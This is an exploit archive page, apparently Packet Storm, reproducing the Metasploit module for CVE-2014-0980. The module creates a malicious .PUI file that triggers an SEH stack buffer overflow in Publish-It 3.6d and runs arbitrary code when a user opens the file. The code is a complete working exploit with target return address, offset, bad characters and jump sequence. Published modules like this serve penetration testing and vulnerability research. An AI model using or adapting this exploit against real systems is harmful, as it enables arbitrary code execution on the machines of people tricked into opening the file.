Publish-It PUI Buffer Overflow

Publish-It PUI Buffer Overflow: Posted Mar 19, 2015; Authored by Daniel Kazimirow, Andrew Smith aka jakx | Site metasploit.com; This Metasploit module exploits a stack based buffer overflow in Publish-It when processing a specially crafted .PUI file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of Publish-It to open a malicious .PUI file.; tags | exploit, remote, overflow, arbitrary; advisories | CVE-2014-0980; SHA-256 | c09c7bc2af2fa4964302e3a4f6d647d52b5f54144194e7dc8ab94d56a1e95f73; Download | Favorite | View

Publish-It PUI Buffer Overflow

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'    => 'Publish-It PUI Buffer Overflow (SEH)',
      'Description'  => %q{
          This module exploits a stack based buffer overflow in Publish-It when
          processing a specially crafted .PUI file. This vulnerability could be
          exploited by a remote attacker to execute arbitrary code on the target
          machine by enticing a user of Publish-It to open a malicious .PUI file.
      },
      'License'    => MSF_LICENSE,
      'Author'    =>
        [
          'Daniel Kazimirow',  # Original discovery
          'Andrew Smith "jakx_"',  # Exploit and MSF Module
        ],
      'References'  =>
        [
          [ 'OSVDB', '102911' ],
          [ 'CVE', '2014-0980' ],
          [ 'EDB', '31461' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process',
        },
      'Platform'  => 'win',
      'Payload'  =>
        {
          'BadChars' => "\x00\x0b\x0a",
          'DisableNops' => true,
          'Space' => 377
        },
      'Targets'    =>
        [
          [ 'Publish-It 3.6d',
            {
              'Ret'     =>  0x0046e95a, #p/p/r | Publish.EXE
              'Offset'  =>  1082
            }
          ],
        ],
      'Privileged'  => false,
      'DisclosureDate'  => 'Feb 5 2014',
      'DefaultTarget'  => 0))

    register_options([OptString.new('FILENAME', [ true, 'The file name.', 'msf.pui']),], self.class)

  end

  def exploit

    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0980.pui")
    fd = File.open(path, "rb")
    template_data = fd.read(fd.stat.size)
    fd.close

    buffer = template_data
    buffer << make_nops(700)
    buffer << payload.encoded
    buffer << make_nops(target['Offset']-payload.encoded.length-700-5)
    buffer << Rex::Arch::X86.jmp('$-399') #long negative jump -399
    buffer << Rex::Arch::X86.jmp_short('$-24') #nseh negative jump
    buffer << make_nops(2)
    buffer << [target.ret].pack("V")

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(buffer)

  end
end

Top Authors In Last 30 Days

Red Hat 183 files
Ubuntu 59 files
Debian 20 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Google Security Research 6 files
E1.Coders 4 files
Ersin Erenler 4 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,007)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,166)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,459)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,428)
UNIX (9,390)
UnixWare (187)
Windows (6,647)
Other

Publish-It PUI Buffer Overflow

Publish-It PUI Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Publish-It PUI Buffer Overflow

Share This

Publish-It PUI Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems